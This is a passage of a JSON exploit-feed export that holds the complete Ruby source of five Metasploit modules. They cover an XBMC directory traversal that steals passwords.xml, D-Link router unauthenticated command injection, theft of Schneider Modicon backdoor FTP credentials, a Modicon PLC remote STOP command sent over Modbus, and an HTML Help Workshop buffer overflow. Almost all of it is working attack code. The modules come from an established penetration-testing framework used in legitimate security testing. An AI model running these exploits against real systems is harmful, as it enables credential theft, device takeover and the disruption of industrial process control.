traversal bug in XBMC 11, up until the\n 2012-11-04 nightly build. The module can only be used to retrieve files.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton\n 'Lucas \"acidgen\" Lundgren IOActive',\n 'Matt \"hostess\" Andreko <mandreko[at]accuvant.com>'\n ],\n 'References' =>\n [\n ['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'],\n ['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],\n ['URL', 'http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf'],\n ],\n 'DisclosureDate' => \"Nov 4 2012\"\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']),\n OptInt.new('DEPTH', [true, 'The max traversal depth', 9]),\n OptString.new('HttpUsername', [true, 'The username to use for the HTTP server', 'xbmc']),\n OptString.new('HttpPassword', [false, 'The password to use for the HTTP server', 'xbmc']),\n ])\n end\n\n def run\n # No point to continue if no filename is specified\n if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?\n print_error(\"Please supply the name of the file you want to download\")\n return\n end\n\n # Create request\n traversal = \"../\" * datastore['DEPTH'] #The longest of all platforms tested was 9 deep\n begin\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => \"/#{traversal}/#{datastore['FILEPATH']}\",\n 'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])\n }, 25)\n rescue Rex::ConnectionRefused\n print_error(\"#{rhost}:#{rport} Could not connect.\")\n return\n end\n\n # Show data if needed\n if res\n if res.code == 200\n vprint_line(res.to_s)\n fname = File.basename(datastore['FILEPATH'])\n\n path = store_loot(\n 'xbmc.http',\n 'application/octet-stream',\n datastore['RHOST'],\n res.body,\n fname\n )\n print_good(\"File saved in: #{path}\")\n elsif res.code == 401\n print_error(\"#{rhost}:#{rport} Authentication failed\")\n elsif res.code == 404\n print_error(\"#{rhost}:#{rport} File not found\")\n end\n else\n print_error(\"HTTP Response failed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/xbmc_traversal.rb"}, {"lastseen": "2019-10-24T10:15:16", "bulletinFamily": "exploit", "description": "This module exploits an OS Command Injection vulnerability in some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in command.php, which is accessible without authentication. This module has been tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. In order to get a remote shell the telnetd could be started without any authentication.\n", "modified": "2019-09-24T11:15:43", "published": "2013-02-04T07:44:12", "id": "MSF:AUXILIARY/ADMIN/HTTP/DLINK_DIR_300_600_EXEC_NOAUTH", "href": "", "type": "metasploit", "title": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution',\n 'Description' => %q{\n This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.\n },\n 'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '89861' ],\n [ 'EDB', '24453' ],\n [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],\n [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],\n [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]\n ],\n 'DisclosureDate' => 'Feb 04 2013'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])\n ])\n end\n\n def run\n uri = '/command.php'\n\n print_status(\"#{rhost}:#{rport} - Sending remote command: \" + datastore['CMD'])\n\n data_cmd = \"cmd=#{datastore['CMD']}; echo end\"\n\n begin\n res = send_request_cgi(\n {\n 'uri' => uri,\n 'method' => 'POST',\n 'data' => data_cmd\n })\n return if res.nil?\n return if (res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\\,\\ HTTP\\/1.1,\\ DIR/)\n return if res.code == 404\n rescue ::Rex::ConnectionError\n vprint_error(\"#{rhost}:#{rport} - Failed to connect to the web server\")\n return\n end\n\n if res.body.include?(\"end\")\n print_good(\"#{rhost}:#{rport} - Exploited successfully\\n\")\n print_line(\"#{rhost}:#{rport} - Command: #{datastore['CMD']}\\n\")\n print_line(\"#{rhost}:#{rport} - Output: #{res.body}\")\n else\n print_error(\"#{rhost}:#{rport} - Exploit failed\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb"}, {"lastseen": "2019-11-27T20:57:30", "bulletinFamily": "exploit", "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and passwords for the system in files that may be retrieved via backdoor access. This module is based on the original 'modiconpass.rb' Basecamp module from DigitalBond.\n", "modified": "2017-07-24T13:26:21", "published": "2012-04-05T17:35:21", "id": "MSF:AUXILIARY/ADMIN/SCADA/MODICON_PASSWORD_RECOVERY", "href": "", "type": "metasploit", "title": "Schneider Modicon Quantum Password Recovery", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Schneider Modicon Quantum Password Recovery',\n 'Description' => %q{\n The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.\n },\n 'Author' =>\n [\n 'K. Reid Wightman <wightman[at]digitalbond.com>', # original module\n 'todb' # Metasploit fixups\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]\n ],\n 'DisclosureDate'=> 'Jan 19 2012'\n ))\n\n register_options(\n [\n Opt::RPORT(21),\n OptString.new('FTPUSER', [true, \"The backdoor account to use for login\", 'ftpuser']),\n OptString.new('FTPPASS', [true, \"The backdoor password to use for login\", 'password'])\n ])\n\n register_advanced_options(\n [\n OptBool.new('RUN_CHECK', [false, \"Check if the device is really a Modicon device\", true])\n ])\n\n end\n\n # Thinking this should be a standard alias for all aux\n def ip\n Rex::Socket.resolv_to_dotted(datastore['RHOST'])\n end\n\n def check_banner\n banner == \"220 FTP server ready.\\r\\n\"\n end\n\n # TODO: If the username and password is correct, but this /isn't/ a Modicon\n # device, then we're going to end up storing HTTP credentials that are not\n # correct. If there's a way to fingerprint the device, it should be done here.\n def check\n is_modicon = false\n vprint_status \"#{ip}:#{rport} - FTP - Checking fingerprint\"\n connect rescue nil\n if sock\n # It's a weak fingerprint, but it's something\n is_modicon = check_banner()\n disconnect\n else\n vprint_error \"#{ip}:#{rport} - FTP - Cannot connect, skipping\"\n return Exploit::CheckCode::Unknown\n end\n\n if is_modicon\n vprint_status \"#{ip}:#{rport} - FTP - Matches Modicon fingerprint\"\n return Exploit::CheckCode::Detected\n else\n vprint_error \"#{ip}:#{rport} - FTP - Skipping due to fingerprint mismatch\"\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def run\n if datastore['RUN_CHECK'] and check == Exploit::CheckCode::Detected\n print_status(\"Service detected.\")\n grab() if setup_ftp_connection()\n else\n grab() if setup_ftp_connection()\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: Time.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def setup_ftp_connection\n vprint_status \"#{ip}:#{rport} - FTP - Connecting\"\n conn = connect_login\n if conn\n print_good(\"#{ip}:#{rport} - FTP - Login succeeded\")\n report_cred(\n ip: ip,\n port: rport,\n user: user,\n password: pass,\n service_name: 'modicon',\n proof: \"connect_login: #{conn}\"\n )\n return true\n else\n print_error(\"#{ip}:#{rport} - FTP - Login failed\")\n return false\n end\n end\n\n def cleanup\n disconnect rescue nil\n data_disconnect rescue nil\n end\n\n # Echo the Net::FTP implementation\n def ftp_gettextfile(fname)\n vprint_status(\"#{ip}:#{rport} - FTP - Opening PASV data socket to download #{fname.inspect}\")\n data_connect(\"A\")\n res = send_cmd_data([\"GET\", fname.to_s], nil, \"A\")\n end\n\n def grab\n logins = Rex::Text::Table.new(\n 'Header'\t=>\t\"Schneider Modicon Quantum services, usernames, and passwords\",\n 'Indent'\t=>\t1,\n 'Columns'\t=>\t[\"Service\", \"User Name\", \"Password\"]\n )\n httpcreds = ftp_gettextfile('/FLASH0/userlist.dat')\n if httpcreds\n print_status \"#{ip}:#{rport} - FTP - HTTP password retrieval: success\"\n else\n print_status \"#{ip}:#{rport} - FTP - HTTP default password presumed\"\n end\n ftpcreds = ftp_gettextfile('/FLASH0/ftp/ftp.ini')\n if ftpcreds\n print_status \"#{ip}:#{rport} - FTP - password retrieval: success\"\n else\n print_error \"#{ip}:#{rport} - FTP - password retrieval error\"\n end\n writecreds = ftp_gettextfile('/FLASH0/rdt/password.rde')\n if writecreds\n print_status \"#{ip}:#{rport} - FTP - Write password retrieval: success\"\n else\n print_error \"#{ip}:#{rport} - FTP - Write password error\"\n end\n if httpcreds\n httpuser = httpcreds[1].split(/[\\r\\n]+/)[0]\n httppass = httpcreds[1].split(/[\\r\\n]+/)[1]\n else\n # Usual defaults\n httpuser = \"USER\"\n httppass = \"USER\"\n end\n print_status(\"#{rhost}:#{rport} - FTP - Storing HTTP credentials\")\n logins << [\"http\", httpuser, httppass]\n report_auth_info(\n :host\t=> ip,\n :port\t=> 80,\n :sname\t=> \"http\",\n :user\t=> httpuser,\n :pass\t=> httppass,\n :active\t=> true\n )\n logins << [\"scada-write\", \"\", writecreds[1]]\n if writecreds # This is like an enable password, used after HTTP authentication.\n report_note(\n :host => ip,\n :port => 80,\n :proto => 'tcp',\n :sname => 'http',\n :ntype => 'scada.modicon.write-password',\n :data => writecreds[1]\n )\n end\n\n if ftpcreds\n # TODO:\n # Can we add a nicer dictionary? Revershing the hash\n # using Metasploit's existing loginDefaultencrypt dictionary yields\n # plaintexts that contain non-ascii characters for some hashes.\n # check out entries starting at 10001 in /msf3/data/wordlists/vxworks_collide_20.txt\n # for examples. A complete ascii rainbow table for loginDefaultEncrypt is ~2.6mb,\n # and it can be done in just a few lines of ruby.\n # See https://github.com/cvonkleist/vxworks_hash\n modicon_ftpuser = ftpcreds[1].split(/[\\r\\n]+/)[0]\n modicon_ftppass = ftpcreds[1].split(/[\\r\\n]+/)[1]\n else\n modicon_ftpuser = \"USER\"\n modicon_ftppass = \"USERUSER\" #from the manual. Verified.\n end\n print_status(\"#{rhost}:#{rport} - FTP - Storing hashed FTP credentials\")\n # The collected hash is not directly reusable, so it shouldn't be an\n # auth credential in the Cred sense. TheLightCosine should fix some day.\n # Can be used for telnet as well if telnet is enabled.\n report_note(\n :host => ip,\n :port => rport,\n :proto => 'tcp',\n :sname => 'ftp',\n :ntype => 'scada.modicon.ftp-password',\n :data => \"User:#{modicon_ftpuser} VXWorks_Password:#{modicon_ftppass}\"\n )\n logins << [\"VxWorks\", modicon_ftpuser, modicon_ftppass]\n\n # Not this:\n # report_auth_info(\n #\t:host\t=> ip,\n #\t:port\t=> rport,\n #\t:proto => 'tcp',\n #\t:sname => 'ftp',\n #\t:user\t=> modicon_ftpuser,\n #\t:pass\t=> modicon_ftppass,\n #\t:type => 'password_vx', # It's a hash, not directly usable, but crackable\n #\t:active\t=> true\n # )\n print_line logins.to_s\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/modicon_password_recovery.rb"}, {"lastseen": "2019-10-30T15:19:46", "bulletinFamily": "exploit", "description": "The Schneider Modicon with Unity series of PLCs use Modbus function code 90 (0x5a) to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and RUN, allowing an attacker to end process control by the PLC. This module is based on the original 'modiconstop.rb' Basecamp module from DigitalBond.\n", "modified": "2017-07-24T13:26:21", "published": "2012-04-05T17:35:21", "id": "MSF:AUXILIARY/ADMIN/SCADA/MODICON_COMMAND", "href": "", "type": "metasploit", "title": "Schneider Modicon Remote START/STOP Command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Schneider Modicon Remote START/STOP Command',\n 'Description' => %q{\n The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.\n },\n 'Author' =>\n [\n 'K. Reid Wightman <wightman[at]digitalbond.com>', # original module\n 'todb' # Metasploit fixups\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]\n ],\n 'DisclosureDate' => 'Apr 5 2012'\n ))\n register_options(\n [\n OptEnum.new(\"MODE\", [true, 'PLC command', \"STOP\",\n [\n \"STOP\",\n \"RUN\"\n ]\n ]),\n Opt::RPORT(502)\n ])\n\n end\n\n # this is used for building a Modbus frame\n # just prepends the payload with a modbus header\n def makeframe(packetdata)\n if packetdata.size > 255\n print_error(\"packet too large, sorry\")\n print_error(\"Offending packet: \" + packetdata)\n return\n end\n payload = \"\"\n payload += [@modbuscounter].pack(\"n\")\n payload += \"\\x00\\x00\\x00\" #dunno what these are\n payload += [packetdata.size].pack(\"c\") # size byte\n payload += packetdata\n end\n\n # a wrapper just to be sure we increment the counter\n def sendframe(payload)\n sock.put(payload)\n @modbuscounter += 1\n r = sock.recv(65535, 0.1) # XXX: All I care is that we wait for a packet to come in, but I'd like to minimize the wait time and also minimize OS buffer use. What to do?\n return r\n end\n\n # This function sends some initialization requests\n # I have no idea what these do, but they seem to be\n # needed to get the Modicon chatty with us.\n # I would make some analogy to 'gaming' in the\n # bar-dating scene, but I'll refrain.\n def init\n payload = \"\\x00\\x5a\\x00\\x02\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x01\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x0a\\x00\" + 'T' * 0xf9\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x03\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x03\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x01\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x0a\\x00\"\n (0..0xf9).each { |x| payload += [x].pack(\"c\") }\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x13\\x00\\x00\\x00\\x00\\x00\\x64\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x13\\x00\\x64\\x00\\x00\\x00\\x9c\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\x64\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x64\\x00\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x5a\\x01\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x5a\\x02\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x46\\x03\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x3c\\x04\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x32\\x05\\x00\\x00\\xf6\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x14\\x00\\x28\\x06\\x00\\x00\\x0c\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x13\\x00\\x00\\x00\\x00\\x00\\x64\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x20\\x00\\x13\\x00\\x64\\x00\\x00\\x00\\x9c\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x10\\x43\\x4c\\x00\\x00\\x0f\"\n payload += \"USER-714E74F21B\" # Yep, really\n #payload += \"META-SPLOITMETA\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x50\\x15\\x00\\x01\\x0b\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x50\\x15\\x00\\x01\\x07\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x12\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x12\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x02\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x58\\x01\\x00\\x00\\x00\\x00\\xff\\xff\\x00\\x70\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x58\\x07\\x01\\x80\\x00\\x00\\x00\\x00\\xfb\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x00\\x58\\x07\\x01\\x80\\x00\\x00\\x00\\x00\\xfb\\x00\"\n sendframe(makeframe(payload))\n end\n\n def stop\n payload = \"\\x00\\x5a\\x01\\x41\\xff\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n end\n\n def start\n payload = \"\\x00\\x5a\\x01\\x40\\xff\\x00\"\n sendframe(makeframe(payload))\n payload = \"\\x00\\x5a\\x01\\x04\"\n sendframe(makeframe(payload))\n end\n\n def run\n @modbuscounter = 0x0000 # used for modbus frames\n connect\n init\n case datastore['MODE']\n when \"STOP\"\n stop\n when \"RUN\"\n start\n else\n print_error(\"Invalid MODE\")\n return\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/modicon_command.rb"}, {"lastseen": "2019-11-20T21:08:59", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.\n", "modified": "2017-09-14T02:03:34", "published": "2009-12-08T20:20:30", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/HHW_HHP_COMPILEDFILE_BOF", "href": "", "type": "metasploit", "title": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'bratax', 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2006-0564'],\n [ 'OSVDB', '22941'],\n [ 'EDB', '1488' ],\n [ 'EDB', '1490' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true,\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x1a\\x2f\\x5c\",\n 'StackAdjustment' => -4800,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP English SP3', { 'Offset' => 242, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Feb 06 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.hhp']),\n ])\n\n end\n\n def exploit\n\n # use the egghunter!\n eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })\n\n off = target['Offset']\n idxf = \"\"\n idxf << make_nops(off - eh_stub.length)\n idxf << eh_stub\n idxf << [target.ret].pack('V')\n\n sploit = \"[OPTIONS]\\r\\n\"\n sploit << \"Compiled file=\"\n sploit << idxf\n sploit << \"\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << \"[FILES]\\r\\n\"\n sploit << \"\\r\\n\"\n sploit << eh_egg\n\n hhp = sploit\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(hhp)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb"}]}